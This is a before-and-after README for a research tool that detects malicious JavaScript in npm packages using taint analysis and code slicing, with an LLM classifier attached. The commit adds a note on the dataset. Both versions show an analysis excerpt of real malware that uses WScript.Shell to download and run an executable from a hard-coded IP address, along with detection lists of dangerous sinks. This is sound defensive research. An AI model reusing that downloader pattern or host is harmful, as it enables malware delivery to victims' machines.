README.md, before:

# JSCodeSlicing

[![Scala](https://img.shields.io/badge/Scala-3.6.4-red.svg)](https://www.scala-lang.org/)
[![Joern](https://img.shields.io/badge/Joern-4.0.436-blue.svg)](https://joern.io/)
[![Docker](https://img.shields.io/badge/Docker-Supported-blue.svg)](https://www.docker.com/)

## 🎯 Overview

JSCodeSlicing (**taint_slicing** folder) is a **static analysis tool** designed to detect malicious patterns in JavaScript code by performing taint analysis and code slicing. It uses **Code Property Graphs (CPG)** powered by [Joern](https://joern.io/) to identify data flows from untrusted sources (e.g., `process.argv`, network requests) to dangerous sinks (e.g., `eval()`, file writes, command execution).

### Why JSCodeSlicing?

- 🔍 **Malware Detection** - Identifies obfuscated malicious code patterns
- 🛡️ **Security Analysis** - Tracks tainted data flows from sources to sinks
- 🐳 **Docker Isolated** - Safely analyze real malware in containers
- 📊 **Code Slicing** - Extracts only relevant code paths for analysis
- ⚡ **Automated** - Batch processing of multiple JavaScript files

---

## ✨ Features

| Feature | Description |
|---------|-------------|
| **Taint Analysis** | Tracks data flow from untrusted sources to dangerous sinks |
| **Malware Detection** | Identifies C&C servers, obfuscation, remote code execution |
| **Code Slicing** | Extracts minimal code needed to understand security flows |
| **Docker Support** | Run analysis in isolated containers for safety |
| **Batch Processing** | Analyze multiple packages with checkpoint tracking |
| **Real Malware Testing** | Includes script to download real malware samples safely |

### Detected Threats

- 🚨 Remote Code Execution (`eval`, `Function`, `setTimeout`)
- 🌐 Network Communication to C&C servers
- 💾 File System Manipulation
- 🔐 Code Obfuscation (Base64, `String.fromCharCode`)
- 🪟 Windows Scripting Host (`WScript.Shell`)
- ⚙️ Process Execution (`child_process.exec`, `spawn`)

---

## 🚀 Quick Start

Choose the method that works best for you:

### Option 1: Docker (Recommended)

**Best for:** Testing with real malware samples in a safe, isolated environment.

#### Prerequisites
- Docker Desktop installed and running
- PowerShell (Windows) or Bash (Linux/Mac)

#### Steps

```powershell
# Windows
.\docker-test.ps1

# Linux/Mac
./docker-test.sh
```

**What happens:**
1. ✅ Builds Docker image with Java 21, SBT, and astgen
2. ✅ Downloads 10 real malware samples inside container
3. ✅ Runs analysis (`sbt run`)
4. ✅ Exports results to `./output/` directory
5. ✅ Cleans up (malware never touches your host machine)

**Output:** `./output/malware_samples/code_slice.txt` (6KB+)

---

### Option 2: Local Installation

**Best for:** Development, debugging, or analyzing your own JavaScript files.

#### Prerequisites

- **Java:** JDK 17 or later
- **SBT:** Scala Build Tool ([install guide](https://www.scala-sbt.org/download.html))
- **astgen:** Binary for your OS ([download here](https://github.com/joernio/astgen/releases))

#### Automated Setup (Windows)

```powershell
.\setup.ps1
```

This script will:
- Check for Java and SBT
- Download the correct `astgen` binary for Windows
- Set environment variables

#### Manual Setup

**1. Download astgen**

Visit [astgen releases](https://github.com/joernio/astgen/releases/tag/v3.35.0) and download:
- Windows: `astgen-win.exe`
- Linux: `astgen-linux`
- macOS: `astgen-macos`

**2. Install astgen**

```bash
# Create directory
mkdir -p ./astgen

# Move downloaded binary
mv ~/Downloads/astgen-* ./astgen/

# Linux/Mac: Make executable
chmod +x ./astgen/astgen-*

# Set environment variable
# Windows (PowerShell)
$env:ASTGEN_BIN = "$PWD\astgen\astgen-win.exe"

# Linux/Mac (Bash)
export ASTGEN_BIN="$(pwd)/astgen/astgen-linux"
```

**3. Verify Installation**

```bash
sbt compile
```

If successful, you're ready to run!

---

## 📖 Usage

### Basic Usage

**1. Prepare Input Files**

Place your JavaScript files in a package directory:

```
src/main/resources/input/
└── my_package/
    ├── app.js
    ├── malicious.js
    └── utils.js
```

**2. Run Analysis**

```bash
sbt run
```

**3. View Results**

```
src/main/resources/output/
└── my_package/
    ├── code_slice.txt    # Extracted malicious code flows
    └── cpg.bin           # Code Property Graph (binary)
```

### Example: Analyzing Test Sample

Create a simple test file:

```bash
mkdir -p src/main/resources/input/test_sample
```

**File:** `src/main/resources/input/test_sample/test.js`
```javascript
var userInput = process.argv[2];  // Source: User input
eval(userInput);                   // Sink: Code execution
```

**Run:**
```bash
sbt run
```

**Result:** Code slice showing the flow from `process.argv` → `eval`

---

### Docker Usage (Real Malware)

**Run with Real Malware Samples:**

```powershell
# Windows
.\docker-test.ps1

# Linux/Mac
docker build -t jscodeslicing-test .
docker run --rm jscodeslicing-test
```

**Add Custom Malware URLs:**

Edit `download-malware.sh`:
```bash
wget -q https://your-malware-source.com/sample.js -O custom_malware.js
```

**Export Results:**

```bash
# Create container
docker create --name malware-test jscodeslicing-test

# Start analysis
docker start -a malware-test

# Copy results to host
docker cp malware-test:/app/src/main/resources/output ./output

# Cleanup
docker rm malware-test
```

---

## 📁 Project Structure

```
taint_slicing/
├── src/
│   ├── main/
│   │   ├── scala/
│   │   │   ├── Main.scala              # Entry point
│   │   │   ├── CodeSlice/
│   │   │   │   ├── CodeSlice.scala     # Trait definition
│   │   │   │   ├── CodeSliceImp.scala  # Core analysis logic
│   │   │   │   ├── Group/              # Source/Sink node groups
│   │   │   │   └── Path/               # Path extraction
│   │   │   ├── FileProcessor/          # File I/O operations
│   │   │   │   ├── IOFileProcessor.scala
│   │   │   │   └── IOFileProcessorImpl.scala
│   │   │   └── Type/
│   │   │       ├── Source/
│   │   │       │   └── SourceGroups.scala  # Define sources
│   │   │       ├── Sink/
│   │   │       │   └── SinkGroups.scala    # Define sinks
│   │   │       └── TypeDefinition.scala
│   │   └── resources/
│   │       ├── input/                   # Your JS files here
│   │       │   └── [package-name]/
│   │       ├── output/                  # Analysis results
│   │       │   └── [package-name]/
│   │       ├── checkpoint.txt           # Processed packages
│   │       └── is_processing.txt        # Currently processing
│   └── test/
│       └── scala/                       # Unit tests
├── astgen/
│   └── astgen-win.exe                   # AST generator binary
├── project/
│   └── build.properties
├── build.sbt                            # SBT configuration
├── Dockerfile                           # Docker image definition
├── docker-test.ps1                      # Windows Docker runner
├── download-malware.sh                  # Malware downloader (Docker only)
├── setup.ps1                            # Windows setup script
└── README.md
```

---

## 🔍 How It Works

### Analysis Pipeline

```
┌─────────────────┐
│ JavaScript Code │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  astgen (CPG)   │  ← Creates Code Property Graph
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Source Detection│  ← Find untrusted data sources
│ - process.argv  │     • User input
│ - HTTP requests │     • Network data
│ - File reads    │     • Environment vars
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Sink Detection  │  ← Find dangerous operations
│ - eval()        │     • Code execution
│ - exec()        │     • Command execution
│ - writeFile()   │     • File writes
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Taint Analysis  │  ← Track data flow
│ (BFS Traversal) │     Source → ... → Sink
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Code Slicing   │  ← Extract relevant code
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ code_slice.txt  │  ← Final output
└─────────────────┘
```

### Source & Sink Definitions

**Sources** (Untrusted Data)
- `process.argv`, `process.env` - User/environment input
- `http.get()`, `fetch()` - Network requests
- `fs.readFile()` - File reads
- `String.fromCharCode()` - Obfuscation
- `atob()`, `decodeURI()` - Encoding

**Sinks** (Dangerous Operations)
- `eval()`, `Function()` - Code execution
- `child_process.exec()` - Command execution
- `fs.writeFile()` - File writes
- `http.request()` - Network sends
- `WScript.Shell.Run()` - Windows execution

📝 *Full lists in `src/main/scala/Type/Source/SourceGroups.scala` and `SinkGroups.scala`*

---

## ⚙️ Configuration

### Customize Sources/Sinks

**Add Custom Source:**

Edit `src/main/scala/Type/Source/SourceGroups.scala`:

```scala
private val CUSTOM_SOURCES: Seq[TypeDefinition] = Seq(
  CallType("myCustomSource"),
  CodeType("myVariable"),
  RegexType(".*pattern.*")
)
```

**Add Custom Sink:**

Edit `src/main/scala/Type/Sink/SinkGroups.scala`:

```scala
private val CUSTOM_SINKS: Seq[TypeDefinition] = Seq(
  CallType("dangerousFunction"),
  RegexType(".*malicious.*")
)
```

### Adjust Timeout

Edit `Main.scala` line 43:

```scala
val TIMEOUT_SECONDS = 180  // Change to 300 for slower analysis
```

---

## 📊 Examples

### Example 1: Simple Taint Flow

**Input:** `src/main/resources/input/example1/test.js`
```javascript
var input = process.argv[2];
eval(input);
```

**Output:** `src/main/resources/output/example1/code_slice.txt`
```
// File: test.js
// ======================================================================
Line 1: var input = process.argv[2]
Line 2: eval(input)
```

---

### Example 2: Real Malware Detection

**Input:** Downloaded malware from Docker

**Output:** `output/malware_samples/code_slice.txt`
```javascript
// File: real_malware_10.js
Line 8: var GnjajlnEi = NbjdnsclFfiBPsM("WScript.Shell");
Line 11: var zzauIjtSBHO = NbjdnsclFfiBPsM("MSXML2.XMLHTTP"); 
Line 32: zzauIjtSBHO.open("GET", MNxmxraR, false);
Line 33: zzauIjtSBHO.send();
Line 43: igMcqGRHjo("http://46.30.42.123/venturi.exe", "199997684.exe", 1)
```

**Analysis:**
- 🚨 C&C Server: `46.30.42.123`
- 🚨 Downloads: `venturi.exe`
- 🚨 Execution: WScript.Shell

---

## 🐛 Troubleshooting

### Common Issues

| Problem | Solution |
|---------|----------|
| **"ASTGEN_BIN not set"** | Set environment variable: `$env:ASTGEN_BIN = "$PWD\astgen\astgen-win.exe"` |
| **"Cannot find astgen binary"** | Download from [releases](https://github.com/joernio/astgen/releases) |
| **"Timeout processing package"** | Increase `TIMEOUT_SECONDS` in `Main.scala` |
| **Empty code_slice.txt** | No flows detected - check source/sink definitions |
| **Docker build fails** | Ensure Docker is running: `docker ps` |

### Debug Mode

Enable verbose logging:

```bash
# Edit build.sbt and add:
logLevel := Level.Debug
```

### Clean Build

```bash
sbt clean compile
```

---

## 🤝 Contributing

Contributions are welcome! Here's how you can help:

1. **Add More Sources/Sinks** - Expand malware detection coverage
2. **Improve Flow Detection** - Enhance taint analysis algorithms
3. **Add Test Cases** - Create more malware samples for testing
4. **Documentation** - Improve guides and examples
5. **Performance** - Optimize CPG traversal

### Development Setup

```bash
# Clone repository
git clone https://github.com/yourusername/JSCodeSlicing.git

# Install dependencies
sbt update

# Run tests
sbt test

# Format code
sbt scalafmt
```

---

## 📚 Resources

- **Joern Documentation:** [https://docs.joern.io/](https://docs.joern.io/)
- **astgen Repository:** [https://github.com/joernio/astgen](https://github.com/joernio/astgen)
- **Code Property Graph:** [https://cpg.joern.io/](https://cpg.joern.io/)
- **Malware Samples:** [MALWARE_LINKS.md](MALWARE_LINKS.md)

---

# Automated Malicious Code Detection using Large Language Models
An LLM-powered security analysis system that uses code slicing to automatically detect malicious code inside npm packages by extracting relevant code slices and evaluating them for harmful behavior (in **prompting** folder).

## Installation
1. Create a vitural environment and activate it
```bash
python3 -m venv venv
# On Window 
.\venv\Scripts\Activate.ps1
# On Macos/linux
source venv/bin/active
```
2. Install dependencies (in venv)
```bash
pip install -r requirements.txt
```
## Usage
1. Create your own config json file to set up your favorite config and model

 For example:
```json
{
  "model_name": "deepseek-ai/deepseek-coder-6.7b-instruct",
  "max_new_tokens": 512,
  "do_sample": true,
  "top_k": 50,
  "top_p": 0.95,
  "temperature": 0.7,
  "num_return_sequences": 1
}
```
2. In file main.py config the path to your json config file
```python
config = ModelConfig.from_json_file("<PATH TO JSON CONFIG FILE>")
```
3. Config slices to detect (Thang will update)


Coming soon ... 

4. Run the model 
```bash
python3 main.py
```
5. Output JSON example:
```
{
  "purpose": string,                 // short single-line description of what this code appears to do
  "sources": [string],               // array of places where input/data is read (e.g., "req.body · line 4", "process.env · line ~1")
  "sinks": [string],                 // array of sensitive sinks or effects (e.g., "eval(...) · line 10", "fs.writeFile · line 12", "exec(...) · line 17")
  "flows": [string],                 // array of source→sink paths with evidence (e.g., "req.body -> eval (line 4 -> line 10)")
  "anomalies": [string],             // unusual patterns, syntax oddities, obfuscation indicators, commented-out dangerous code etc.
  "analysis": string,                // step-by-step numbered analysis of the entire fragment (concise paragraphs)
  "conclusion": string,              // short summary conclusion (one or two sentences)
  "confidence": float,               // overall confidence (0.00-1.00)
  "obfuscated": float,               // estimated obfuscation likelihood (0.00-1.00)
  "malware": float,                  // estimated malware likelihood (0.00-1.00)
  "securityRisk": float              // estimated security risk severity (0.00-1.00)
}
```
---

**Made with ❤️ by Security Researchers**

*Last Updated: November 2025*

---

# ⚠️ Disclaimer

This tool is designed for **security research and educational purposes only**. The included malware samples are real and potentially harmful. Always use Docker for malware analysis and never execute malware on production systems.

**Use at your own risk.** The authors are not responsible for any damage caused by misuse of this tool.

Commit message:

add Dataset info in README

README.md, after:

# JSCodeSlicing

[![Scala](https://img.shields.io/badge/Scala-3.6.4-red.svg)](https://www.scala-lang.org/)
[![Joern](https://img.shields.io/badge/Joern-4.0.436-blue.svg)](https://joern.io/)
[![Docker](https://img.shields.io/badge/Docker-Supported-blue.svg)](https://www.docker.com/)

## 🎯 Overview

JSCodeSlicing (**taint_slicing** folder) is a **static analysis tool** designed to detect malicious patterns in JavaScript code by performing taint analysis and code slicing. It uses **Code Property Graphs (CPG)** powered by [Joern](https://joern.io/) to identify data flows from untrusted sources (e.g., `process.argv`, network requests) to dangerous sinks (e.g., `eval()`, file writes, command execution).

### Why JSCodeSlicing?

- 🔍 **Malware Detection** - Identifies obfuscated malicious code patterns
- 🛡️ **Security Analysis** - Tracks tainted data flows from sources to sinks
- 🐳 **Docker Isolated** - Safely analyze real malware in containers
- 📊 **Code Slicing** - Extracts only relevant code paths for analysis
- ⚡ **Automated** - Batch processing of multiple JavaScript files

---

## ✨ Features

| Feature | Description |
|---------|-------------|
| **Taint Analysis** | Tracks data flow from untrusted sources to dangerous sinks |
| **Malware Detection** | Identifies C&C servers, obfuscation, remote code execution |
| **Code Slicing** | Extracts minimal code needed to understand security flows |
| **Docker Support** | Run analysis in isolated containers for safety |
| **Batch Processing** | Analyze multiple packages with checkpoint tracking |
| **Real Malware Testing** | Includes script to download real malware samples safely |

### Detected Threats

- 🚨 Remote Code Execution (`eval`, `Function`, `setTimeout`)
- 🌐 Network Communication to C&C servers
- 💾 File System Manipulation
- 🔐 Code Obfuscation (Base64, `String.fromCharCode`)
- 🪟 Windows Scripting Host (`WScript.Shell`)
- ⚙️ Process Execution (`child_process.exec`, `spawn`)

---

## Dataset

This research uses the malicious package dataset provided by Wang et al. in their repository [MalPacDetector](https://github.com/CGCL-codes/MalPacDetector-core)    
The dataset is **not publicly available** due to security reasons and its unpublished status.  

We have obtained permission to use it for our research.  
If you wish to access the dataset, please contact the original authors directly: hust_jianw@hust.edu.cn.

---

## 🚀 Quick Start

Choose the method that works best for you:

### Option 1: Docker (Recommended)

**Best for:** Testing with real malware samples in a safe, isolated environment.

#### Prerequisites
- Docker Desktop installed and running
- PowerShell (Windows) or Bash (Linux/Mac)

#### Steps

```powershell
# Windows
.\docker-test.ps1

# Linux/Mac
./docker-test.sh
```

**What happens:**
1. ✅ Builds Docker image with Java 21, SBT, and astgen
2. ✅ Downloads 10 real malware samples inside container
3. ✅ Runs analysis (`sbt run`)
4. ✅ Exports results to `./output/` directory
5. ✅ Cleans up (malware never touches your host machine)

**Output:** `./output/malware_samples/code_slice.txt` (6KB+)

---

### Option 2: Local Installation

**Best for:** Development, debugging, or analyzing your own JavaScript files.

#### Prerequisites

- **Java:** JDK 17 or later
- **SBT:** Scala Build Tool ([install guide](https://www.scala-sbt.org/download.html))
- **astgen:** Binary for your OS ([download here](https://github.com/joernio/astgen/releases))

#### Automated Setup (Windows)

```powershell
.\setup.ps1
```

This script will:
- Check for Java and SBT
- Download the correct `astgen` binary for Windows
- Set environment variables

#### Manual Setup

**1. Download astgen**

Visit [astgen releases](https://github.com/joernio/astgen/releases/tag/v3.35.0) and download:
- Windows: `astgen-win.exe`
- Linux: `astgen-linux`
- macOS: `astgen-macos`

**2. Install astgen**

```bash
# Create directory
mkdir -p ./astgen

# Move downloaded binary
mv ~/Downloads/astgen-* ./astgen/

# Linux/Mac: Make executable
chmod +x ./astgen/astgen-*

# Set environment variable
# Windows (PowerShell)
$env:ASTGEN_BIN = "$PWD\astgen\astgen-win.exe"

# Linux/Mac (Bash)
export ASTGEN_BIN="$(pwd)/astgen/astgen-linux"
```

**3. Verify Installation**

```bash
sbt compile
```

If successful, you're ready to run!

---

## 📖 Usage

### Basic Usage

**1. Prepare Input Files**

Place your JavaScript files in a package directory:

```
src/main/resources/input/
└── my_package/
    ├── app.js
    ├── malicious.js
    └── utils.js
```

**2. Run Analysis**

```bash
sbt run
```

**3. View Results**

```
src/main/resources/output/
└── my_package/
    ├── code_slice.txt    # Extracted malicious code flows
    └── cpg.bin           # Code Property Graph (binary)
```

### Example: Analyzing Test Sample

Create a simple test file:

```bash
mkdir -p src/main/resources/input/test_sample
```

**File:** `src/main/resources/input/test_sample/test.js`
```javascript
var userInput = process.argv[2];  // Source: User input
eval(userInput);                   // Sink: Code execution
```

**Run:**
```bash
sbt run
```

**Result:** Code slice showing the flow from `process.argv` → `eval`

---

### Docker Usage (Real Malware)

**Run with Real Malware Samples:**

```powershell
# Windows
.\docker-test.ps1

# Linux/Mac
docker build -t jscodeslicing-test .
docker run --rm jscodeslicing-test
```

**Add Custom Malware URLs:**

Edit `download-malware.sh`:
```bash
wget -q https://your-malware-source.com/sample.js -O custom_malware.js
```

**Export Results:**

```bash
# Create container
docker create --name malware-test jscodeslicing-test

# Start analysis
docker start -a malware-test

# Copy results to host
docker cp malware-test:/app/src/main/resources/output ./output

# Cleanup
docker rm malware-test
```

---

## 📁 Project Structure

```
taint_slicing/
├── src/
│   ├── main/
│   │   ├── scala/
│   │   │   ├── Main.scala              # Entry point
│   │   │   ├── CodeSlice/
│   │   │   │   ├── CodeSlice.scala     # Trait definition
│   │   │   │   ├── CodeSliceImp.scala  # Core analysis logic
│   │   │   │   ├── Group/              # Source/Sink node groups
│   │   │   │   └── Path/               # Path extraction
│   │   │   ├── FileProcessor/          # File I/O operations
│   │   │   │   ├── IOFileProcessor.scala
│   │   │   │   └── IOFileProcessorImpl.scala
│   │   │   └── Type/
│   │   │       ├── Source/
│   │   │       │   └── SourceGroups.scala  # Define sources
│   │   │       ├── Sink/
│   │   │       │   └── SinkGroups.scala    # Define sinks
│   │   │       └── TypeDefinition.scala
│   │   └── resources/
│   │       ├── input/                   # Your JS files here
│   │       │   └── [package-name]/
│   │       ├── output/                  # Analysis results
│   │       │   └── [package-name]/
│   │       ├── checkpoint.txt           # Processed packages
│   │       └── is_processing.txt        # Currently processing
│   └── test/
│       └── scala/                       # Unit tests
├── astgen/
│   └── astgen-win.exe                   # AST generator binary
├── project/
│   └── build.properties
├── build.sbt                            # SBT configuration
├── Dockerfile                           # Docker image definition
├── docker-test.ps1                      # Windows Docker runner
├── download-malware.sh                  # Malware downloader (Docker only)
├── setup.ps1                            # Windows setup script
└── README.md
```

---

## 🔍 How It Works

### Analysis Pipeline

```
┌─────────────────┐
│ JavaScript Code │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  astgen (CPG)   │  ← Creates Code Property Graph
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Source Detection│  ← Find untrusted data sources
│ - process.argv  │     • User input
│ - HTTP requests │     • Network data
│ - File reads    │     • Environment vars
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Sink Detection  │  ← Find dangerous operations
│ - eval()        │     • Code execution
│ - exec()        │     • Command execution
│ - writeFile()   │     • File writes
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Taint Analysis  │  ← Track data flow
│ (BFS Traversal) │     Source → ... → Sink
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Code Slicing   │  ← Extract relevant code
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ code_slice.txt  │  ← Final output
└─────────────────┘
```

### Source & Sink Definitions

**Sources** (Untrusted Data)
- `process.argv`, `process.env` - User/environment input
- `http.get()`, `fetch()` - Network requests
- `fs.readFile()` - File reads
- `String.fromCharCode()` - Obfuscation
- `atob()`, `decodeURI()` - Encoding

**Sinks** (Dangerous Operations)
- `eval()`, `Function()` - Code execution
- `child_process.exec()` - Command execution
- `fs.writeFile()` - File writes
- `http.request()` - Network sends
- `WScript.Shell.Run()` - Windows execution

📝 *Full lists in `src/main/scala/Type/Source/SourceGroups.scala` and `SinkGroups.scala`*

---

## ⚙️ Configuration

### Customize Sources/Sinks

**Add Custom Source:**

Edit `src/main/scala/Type/Source/SourceGroups.scala`:

```scala
private val CUSTOM_SOURCES: Seq[TypeDefinition] = Seq(
  CallType("myCustomSource"),
  CodeType("myVariable"),
  RegexType(".*pattern.*")
)
```

**Add Custom Sink:**

Edit `src/main/scala/Type/Sink/SinkGroups.scala`:

```scala
private val CUSTOM_SINKS: Seq[TypeDefinition] = Seq(
  CallType("dangerousFunction"),
  RegexType(".*malicious.*")
)
```

### Adjust Timeout

Edit `Main.scala` line 43:

```scala
val TIMEOUT_SECONDS = 180  // Change to 300 for slower analysis
```

---

## 📊 Examples

### Example 1: Simple Taint Flow

**Input:** `src/main/resources/input/example1/test.js`
```javascript
var input = process.argv[2];
eval(input);
```

**Output:** `src/main/resources/output/example1/code_slice.txt`
```
// File: test.js
// ======================================================================
Line 1: var input = process.argv[2]
Line 2: eval(input)
```

---

### Example 2: Real Malware Detection

**Input:** Downloaded malware from Docker

**Output:** `output/malware_samples/code_slice.txt`
```javascript
// File: real_malware_10.js
Line 8: var GnjajlnEi = NbjdnsclFfiBPsM("WScript.Shell");
Line 11: var zzauIjtSBHO = NbjdnsclFfiBPsM("MSXML2.XMLHTTP"); 
Line 32: zzauIjtSBHO.open("GET", MNxmxraR, false);
Line 33: zzauIjtSBHO.send();
Line 43: igMcqGRHjo("http://46.30.42.123/venturi.exe", "199997684.exe", 1)
```

**Analysis:**
- 🚨 C&C Server: `46.30.42.123`
- 🚨 Downloads: `venturi.exe`
- 🚨 Execution: WScript.Shell

---

## 🐛 Troubleshooting

### Common Issues

| Problem | Solution |
|---------|----------|
| **"ASTGEN_BIN not set"** | Set environment variable: `$env:ASTGEN_BIN = "$PWD\astgen\astgen-win.exe"` |
| **"Cannot find astgen binary"** | Download from [releases](https://github.com/joernio/astgen/releases) |
| **"Timeout processing package"** | Increase `TIMEOUT_SECONDS` in `Main.scala` |
| **Empty code_slice.txt** | No flows detected - check source/sink definitions |
| **Docker build fails** | Ensure Docker is running: `docker ps` |

### Debug Mode

Enable verbose logging:

```bash
# Edit build.sbt and add:
logLevel := Level.Debug
```

### Clean Build

```bash
sbt clean compile
```

---

## 🤝 Contributing

Contributions are welcome! Here's how you can help:

1. **Add More Sources/Sinks** - Expand malware detection coverage
2. **Improve Flow Detection** - Enhance taint analysis algorithms
3. **Add Test Cases** - Create more malware samples for testing
4. **Documentation** - Improve guides and examples
5. **Performance** - Optimize CPG traversal

### Development Setup

```bash
# Clone repository
git clone https://github.com/yourusername/JSCodeSlicing.git

# Install dependencies
sbt update

# Run tests
sbt test

# Format code
sbt scalafmt
```

---

## 📚 Resources

- **Joern Documentation:** [https://docs.joern.io/](https://docs.joern.io/)
- **astgen Repository:** [https://github.com/joernio/astgen](https://github.com/joernio/astgen)
- **Code Property Graph:** [https://cpg.joern.io/](https://cpg.joern.io/)
- **Malware Samples:** [MALWARE_LINKS.md](MALWARE_LINKS.md)

---

# Automated Malicious Code Detection using Large Language Models
An LLM-powered security analysis system that uses code slicing to automatically detect malicious code inside npm packages by extracting relevant code slices and evaluating them for harmful behavior (in **prompting** folder).

## Installation
1. Create a vitural environment and activate it
```bash
python3 -m venv venv
# On Window 
.\venv\Scripts\Activate.ps1
# On Macos/linux
source venv/bin/active
```
2. Install dependencies (in venv)
```bash
pip install -r requirements.txt
```
## Usage
1. Create your own config json file to set up your favorite config and model

 For example:
```json
{
  "model_name": "deepseek-ai/deepseek-coder-6.7b-instruct",
  "max_new_tokens": 512,
  "do_sample": true,
  "top_k": 50,
  "top_p": 0.95,
  "temperature": 0.7,
  "num_return_sequences": 1
}
```
2. In file main.py config the path to your json config file
```python
config = ModelConfig.from_json_file("<PATH TO JSON CONFIG FILE>")
```
3. Config slices to detect (Thang will update)


Coming soon ... 

4. Run the model 
```bash
python3 main.py
```
5. Output JSON example:
```
{
  "purpose": string,                 // short single-line description of what this code appears to do
  "sources": [string],               // array of places where input/data is read (e.g., "req.body · line 4", "process.env · line ~1")
  "sinks": [string],                 // array of sensitive sinks or effects (e.g., "eval(...) · line 10", "fs.writeFile · line 12", "exec(...) · line 17")
  "flows": [string],                 // array of source→sink paths with evidence (e.g., "req.body -> eval (line 4 -> line 10)")
  "anomalies": [string],             // unusual patterns, syntax oddities, obfuscation indicators, commented-out dangerous code etc.
  "analysis": string,                // step-by-step numbered analysis of the entire fragment (concise paragraphs)
  "conclusion": string,              // short summary conclusion (one or two sentences)
  "confidence": float,               // overall confidence (0.00-1.00)
  "obfuscated": float,               // estimated obfuscation likelihood (0.00-1.00)
  "malware": float,                  // estimated malware likelihood (0.00-1.00)
  "securityRisk": float              // estimated security risk severity (0.00-1.00)
}
```
---

**Made with ❤️ by Security Researchers**

*Last Updated: November 2025*

---

# ⚠️ Disclaimer

This tool is designed for **security research and educational purposes only**. The included malware samples are real and potentially harmful. Always use Docker for malware analysis and never execute malware on production systems.

**Use at your own risk.** The authors are not responsible for any damage caused by misuse of this tool.
